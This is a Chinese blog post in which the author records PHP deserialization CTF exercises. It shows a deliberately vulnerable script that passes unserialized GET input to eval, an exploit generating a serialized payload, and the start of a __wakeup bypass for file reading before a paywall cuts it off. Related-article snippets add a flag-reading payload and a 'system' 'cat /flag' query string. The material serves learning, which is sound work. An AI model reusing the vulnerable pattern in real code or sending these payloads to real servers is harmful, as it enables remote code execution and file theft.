PHP反序列化题目记录

最新推荐文章于 2024-04-28 18:08:34 发布
最新推荐文章于 2024-04-28 18:08:34 发布
阅读量829 收藏 3
点赞数 1
分类专栏: 笔记 文章标签: php java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BaiScorpio/article/details/125356572
版权

文章目录

前言

最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。
以下代码均来自网络,仅记录个人的学习过程。

1.反序列化例子

//test1.php
<?php
class Test{
    public $value="";

    public function __destruct()
    {
        eval($this->value);
    }
}

unserialize($_GET['test']);
?>

第一步,先找传参处是get方法的test参数;
第二步,找反序列函数unserialize(变量);看其中变量是否可控;
第三步,查找敏感函数,发现eval函数,想办法控制其中的参数变量,让其执行我们想要执行的命令。
看到这里可以发现,无论是PHP的反序列化还是Java的反序列化,抛开语法特性不谈,在流程上是一个意思,第一步是反序列化的入口,可以对应到如java的fastjson就是一个可以rce的反序列化入口;第二第三步其实是一种反序列化的方法,可以对应到java的反序列化利用链,只不过Java的反序列化链利用的是一些内置包中的类,如Apache Commons Collections中的InvokerTransformer类等构造处一条能够命令执行的链子;所以,在java当中链子常是通用的,可以通过链子生成fastjson格式的payload,其实就和base64加密sql语句注入一个道理,其实很多本质上都是通过jndi去注入。
第四步,通过目标代码反序列化的流程,构造一个序列化的恶意类传入,达到rce的目的。

// test1exp.php
<?php
class Test{
}
$p = new Test();
$p->value = 'phpinfo();';
$s = serialize($p);
echo $s;
?>

// 执行结果
// O:4:"Test":1:{s:5:"value";s:10:"phpinfo();";}

打开:http://localhost/UnseriStudy/test1.php?test=O:4:"Test":1:{s:5:"value";s:10:"phpinfo();";}

// 执行结果
// 执行了命令 phpinfo();

这是因为test1.php 中的 Test类 有个 公有类型的变量 $value
而在  test1exp.php 文件中把这个 $value 值修改并且序列化了
接着 Test类 有个 __destruct()方法  类在销毁的之前调用了该方法,该方法里面的内容可控,最终执行了命令

在这里插入图片描述

2.反序列化绕过__wakeup()任意文件读取的方法

//index_test2.php
This is first page.

//test2.php
<?php 
class SoFun{ 
  protected $file='index_test2.php';
  function __destruct(){ 
    if(!empty($this->file)) {
      if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)
        show_source(dirname (__FILE__).'/'.$this ->file);
      else
        die('Wrong filename.');
    }
  }  
  function __wakeup(){
   $this-> file='index_test2.php';
  } 
  public func
最低0.47元/天 解锁文章
白色的蝎子
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
两道序列例题
limenzzz的博客
05-03 1255
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造序列的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
浅谈 php原生类的利用 1(文件操作类)
weixin_63231007的博客
05-13 2082
前言 在学习的过程中,战队里的师傅给我发了一道之前没遇见过的序列题,引出了原生类这个方面。这一知识点在后面刷题时也会遇到,提前学习一下。借这道题,对原生类的知识点进行一下学习与记录。 例题: <?php highlight_file(__FILE__); class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public functio
php序列以及相关例题
最新发布
2401_82388450的博客
04-28 1071
1.序列就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。简单来说就是将内存变成文件,在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列就是将内存的变量数据“保存”到文件中的持久数据的过程。2.序列就是在适当的时候把这个字符串再转成原来的变量使用。
【java】序列序列简单示例
CamphorBlossom的博客
01-31 2031
概念 java提供了一种对象序列的机制,该机制中,一个对象可以被表示为一个字节序列(包括对象的数据、有关对象的类型和存储的数据类型信息)。简单点说,序列表示将对象的状态转成特定的流的过程;序列表示从特定的流中获取数据重新构建成对象的过程。 流:stream,二进制的字节序列。 另一方面理解,从内存读取到硬盘上的过程,可以看做是拆分对象;从硬盘读取到内存里的过程,可以看做是组装对象。 序列的实现 类 ObjectInputStream 和 ObjectOutputStream 是
%3c?php+eval,2020全国工业互联网安全技术技能大赛Web题WP
weixin_39880632的博客
03-23 491
0x00 SimpleCalculatorhttp://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag。0x01 easyphp打开后发现是个...
CTF 序列入门例题wp
qq_47168481的博客
10-20 2579
最近有再看序列,尝试着学一下比赛中的序列: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
PHP笔试题目汇总 提高您的面试成功率
04-14
10. PHP数组序列序列的函数是`serialize`和`unserialize`。 11. `rawurlencode`和`urlencode`的区别: - `rawurlencode`将空格转换为%20,而`urlencode`将空格转换为+。 12. PHP过滤HTML的函数是`strip_...
PHP mysql基础知识技术考题分享,用于面试,考题用
10-20
7. 使用`serialize`函数可以将类的属性序列保存到session中,之后通过`unserialize`恢复。 【GD库】GD库是PHP中的图像处理库,用于创建、修改和操作图像,支持多种格式,如JPEG、PNG、GIF等,常用于图像处理,如...
金盾信安比赛记录.pdf
12-12
参赛者需要编写脚本解密密码,然后利用Shiro序列工具来获取flag。这里的flag值可能是由于后端逻辑错误而意外暴露的。 5. **加密与栅栏密码** 提供的是一段栅栏密码,通过理解8位的flag结构,可以推断出加密...
2021-2022计算机二级等级考试试题及答案No.1958.docx
10-31
这些题目涵盖了计算机二级等级考试中的多个知识点,包括逻辑表达式、编程语言规范、CSS样式、数据库操作、排序算法、Access模块、数组初始、链表结构、SQL查询、窗体控件、键盘区域、焦点设置、类对象创建、赋值...
2021-2022计算机二级等级考试试题及答案No.13975.docx
10-27
22. FoxBase 命令序列:SKIP -1跳过第一条记录,DISP NEXT 2显示下两条记录,RECNO()返回当前记录号,初始为1,跳过后为2。 23. Java GUI:图形用户界面,组件主要在java.awt和javax.swing包中。 24. 空值的理解:...
php class destruct,PHP面向对象之析构方法 (__destruct())
weixin_34191685的博客
03-10 276
析构方法语法当对象销毁的时候自动调用析构函数不可以带参数function __destruct(){}class Student {private $name;//构造方法public function __construct($name) {$this->name= $name;echo "{$name}出生了";}//析构方法public function __destruct() {e...
PHP序列学习(包含实例)
kiwi的博客
11-09 312
上面的是某道ctf题目其中highlight_file为高亮显示某个文件里面的内容serialize为序列函数unserialize为序列函数flag就在flag.php文件里面我们的思路就是利用highlight_file函数将flag.php读取获得flag__toString为当输出字符串的时候才会执行的方法就等于
[2021 蓝帽杯]杰克与肉丝
qq_64201116的博客
10-06 820
我没做出来的原因是没有从后往前赋值,要先对序号后面的值进行赋值,再引用前面的类。否则会返回赋值为空的报错。还有要注意的就是从后往前赋值。其他没什么了(我下面标出了序号)链子的过程比较简单 ,难点在绕过md5那里,以前没有接触过。如果同行的话,则md5值不相等。这里有个非常有意思的绕过md5和sh1的方法。原生类Exception绕过md5,sha1。
从一道CTF题学习PHP序列漏洞
Fly_鹏程万里
09-17 6280
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP序列漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
php class 创建实例,php 创建类实例的构造方法调用问题
weixin_28785657的博客
03-23 372
本文说的是php创建一个类的实例的时候,构造方法调用的问题。php中不像java一样,创建一个class的实例的时候 会自动的首先调用父类(超类)的构造方法,以确保所有的属性都可以被正确的初始php 不会在本类的构造方法中再自动的调用父类的构造方法。如果真的需要调用父类的构造方法,可以手动的调用parent::__construct($params...);class Base{functio...
PHP序列之练习题
shy的博客
11-29 1504
pikachu平台序列漏洞 第一题:序列漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
php序列学习及简单的序列漏洞介绍
L1ni01
10-13 447
php序列学习经历 1.为什么会有序列序列 我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,序列输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。 序列(串行):是将变量转换为可保存或传输的字符串的过程; 序列串行):就是在适当的时候把这个字符串再转成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 2.相关函数 serialize是序列函数 先看看数组的序列 <?php $x
PHP序列题目
Galaxy_fan的博客
10-01 879
百度杯十月场_Hash hash用Md5解密是kkkkkk01123 把123换成234,MD5加密 获得变量var,base64解密,正则匹配,如果匹配程序结束,否则序列变量var 为了得到f15g_is_here.php内容要绕过正则匹配和_wakeup方法。_wakeup有一个bug就是当序列字符串中表示对象属性个数的值大于真是的属性个数是就会跳过_wakeup,然后绕过正则可以...
PHP序列序列
09-14
PHP序列序列是将PHP对象转换为可存储或传输的格式,以及将已序列的数据重新恢复为PHP对象的过程。 在PHP中,序列可以通过serialize()函数实现,该函数将PHP对象转换为一个字符串。序列则可以通过unserialize()函数来实现,将已序列的字符串转换回原始的PHP对象。 序列序列的主要目的是为了方便对象的存储和传输。当我们需要将PHP对象保存到数据库或文件中,或者需要通过网络传输对象时,序列就起到了重要的作用。通过序列对象,我们可以将对象转换为字符串形式,从而可以方便地保存到数据库、文件或者通过网络传输。 序列则是将已序列的数据重新恢复为原始的PHP对象,使得我们能够再次使用对象的属性和方法。通过序列,我们可以将已序列的数据重新转换为PHP对象,并继续操作和使用该对象的属性和方法。 序列序列PHP中是非常常见的操作,可以用于各种场景,例如在缓存中存储对象数据、在分布式系统中传输对象数据等。 总结一下,PHP序列序列是将PHP对象转换为可存储或传输的格式以及将已序列的数据重新恢复为PHP对象的过程,通过serialize()函数和unserialize()函数实现。它们在PHP中广泛应用于对象的存储和传输。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值